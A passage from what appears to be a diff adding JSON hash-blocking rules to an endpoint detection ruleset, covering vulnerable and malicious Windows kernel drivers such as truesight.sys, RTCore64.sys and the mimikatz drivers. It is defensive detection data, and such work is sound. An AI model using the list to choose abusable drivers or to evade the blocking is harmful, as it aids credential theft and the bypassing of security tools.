"comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82d48878-dd67-501a-9a35-28f360c758d5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468016Z", + "creation_date": "2026-03-23T11:45:30.468019Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468029Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f2b0d70e2d55a5f69ddaac13460cfcd63746ac1c09f826772cca5b857dde240a", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82d5e3f6-c043-55bb-9f82-dcb528f2e191", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.982104Z", + "creation_date": "2026-03-23T11:45:29.982106Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982111Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3279593db91bb7ad5b489a01808c645eafafda6cc9c39f50d10ccc30203f2ddf", + "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82d64303-ca93-567e-848b-5e6a53865f6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148980Z", + "creation_date": "2026-03-23T11:45:31.148982Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148990Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dc6f8fab6fb713f0cc635a816bea4b64ba0243624ec880bfe7a9829649a2bfbb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"82da04eb-23a1-5e82-abdc-a2bd1f12eab6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477675Z", + "creation_date": "2026-03-23T11:45:31.477679Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477689Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "49375b39428fa7c8e55b0bcdbbbbc27668faa934a401ec91fd88a33ab4b2375d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82dde3e3-91d9-5ebb-a6df-e79c402e36dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466551Z", + "creation_date": "2026-03-23T11:45:30.466555Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.466564Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee525b90053bb30908b5d7bf4c5e9b8b9d6b7b5c9091a26fa25d30d3ad8ef5d0", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82ded53d-72a6-5963-a6ec-4fa5655c60cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.147058Z", + "creation_date": "2026-03-23T11:45:32.147060Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.147066Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "206f27ae820783b7755bca89f83a0fe096dbb510018dd65b63fc80bd20c03261", + "comment": "Vulnerable Kernel Driver (aka NSecKrnl.sys) [https://x.com/anylink20240604/status/1967181190949228608] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82e629a7-d57f-56b2-abdc-8b2a234fa160", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146136Z",
+ "creation_date": "2026-03-23T11:45:32.146138Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146144Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "167730744bd7cb117aae9931f81d20cbd2ec6eee480388c53d2fc973ede920ea",
+ "comment": "Malicious Kernel Driver (aka driver_16773074.sys) [https://www.loldrivers.io/drivers/a0f0d0db-15a2-48e4-af39-50967ee8b541/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82e85799-6767-5d9a-9086-84111b4537a2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476800Z",
+ "creation_date": "2026-03-23T11:45:30.476804Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476813Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2a330131ca4a9499736fdc72e819a6ff1f883b1c6dc7b83d5b69d288508e0fe",
+ "comment": "Vulnerable Kernel Driver (aka 
libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82e9c5c2-ca8e-512a-829f-23b7815fd613",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608014Z",
+ "creation_date": "2026-03-23T11:45:29.608016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608022Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5182caf10de9cec0740ecde5a081c21cdc100d7eb328ffe6f3f63183889fec6b",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82efc428-68e5-51da-93a0-77d5150ad7ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826314Z",
+ "creation_date": "2026-03-23T11:45:31.826316Z",
+ "enabled": 
true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826322Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9dfeef1377073421a97c12fc8d6f1de1ef29835b4cae03a2f9347a5e68b3ec62",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82f16176-a88d-5f84-9c2b-effc1931c29b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984286Z",
+ "creation_date": "2026-03-23T11:45:29.984288Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984293Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "457e2eb5ee1def0e336463b7f62dcc02fdde307b817cf750907a5f5465c4dcb7",
+ "comment": "Vulnerable Kernel Driver (aka irec.sys) [https://www.loldrivers.io/drivers/d74fdf19-b4b0-4ec2-9c29-4213b064138b/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82f36c10-f4f8-5879-b5c6-96147861cbfe",
+ "test_maturity_current_count": 0,
+ 
"test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820725Z",
+ "creation_date": "2026-03-23T11:45:31.820729Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820737Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db5c7773b067c9671fff4b0fbc3c27a2d9fddfd4ca79d2bab56b9619a3de625a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82f4cd57-63b7-5b48-a3cf-a9682dea8d7d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812454Z",
+ "creation_date": "2026-03-23T11:45:31.812456Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812461Z",
+ "rule_level": null,
+ 
"rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5825bece9c191da9975c36a96a9b507840a54628085f3beb06c8f610d59bb467",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "830dcca3-ad41-5a5b-9dfc-9f1042a24390",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985412Z",
+ "creation_date": "2026-03-23T11:45:29.985414Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985419Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "961012d06eeaabd9eff9b36173e566bf148a5c8f743f3329c70d8918eba26093",
+ "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8311bac2-b999-56f6-9e7f-3282783a7d40",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816320Z",
+ "creation_date": "2026-03-23T11:45:30.816322Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816328Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d0e4d3e1f5d5942aaf2c72631e9490eecc4d295ee78c323d8fe05092e5b788eb",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "831538aa-6315-5a7f-9748-81cb92f646cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492002Z",
+ "creation_date": "2026-03-23T11:45:31.492004Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492009Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5afa53cab2140ac26e16da42fc50a74e0c3a8cd3d44c3803f3168b9f3223ef7c",
+ "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83231f59-2a54-5958-bee7-0928e6edba6c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604861Z",
+ "creation_date": "2026-03-23T11:45:29.604863Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604868Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c66af86b1c024969f80c1daf1c11ed88467035853083a2abf955e22171c63542",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83364ac4-7213-5896-8f72-dde1c1a44db8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462370Z",
+ "creation_date": 
"2026-03-23T11:45:30.462373Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462382Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ed8d68c07947c01ca03d886e6ca795a3f8b2f079e8292f019bba3b97b41eef54",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "834cbdee-0c88-58aa-9ddd-5a6c55b2a0a2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474217Z",
+ "creation_date": "2026-03-23T11:45:30.474220Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474229Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d130e3e052b09dc154c32c170c227f7baaf74fa7767943478876c744fc3d026d",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "834eb938-6551-571d-a528-4bf90e486883",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484245Z",
+ "creation_date": "2026-03-23T11:45:31.484249Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484258Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b446c8359d0d991f332b79adb9591e835a3c4b8fbf874047414f9456e6a728b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8350dc32-12f7-5ed3-b0db-4948e17739cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835737Z",
+ "creation_date": "2026-03-23T11:45:30.835739Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835745Z",
+ "rule_level": null,
+ "rule_level_override": 
null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82363ae5ac1f8f33cb83fbf9405fac2d77aa754e1e8a88a517656f19c0d12e67",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83575387-f3ee-5e60-a7bc-4a52d242b24d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971839Z",
+ "creation_date": "2026-03-23T11:45:29.971841Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971847Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "25c423b2170e7cb44134da651e87708631be0c9db8713c0bdb7b917c76c338a7",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83591fac-4d50-5ccb-ac60-934e7c3f7518",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467151Z",
+ "creation_date": "2026-03-23T11:45:30.467154Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467164Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6416ea9d2a15899dbf4a98b70bdedb4cc6eaf748c14c554b26ae2fe57ef8aa2a",
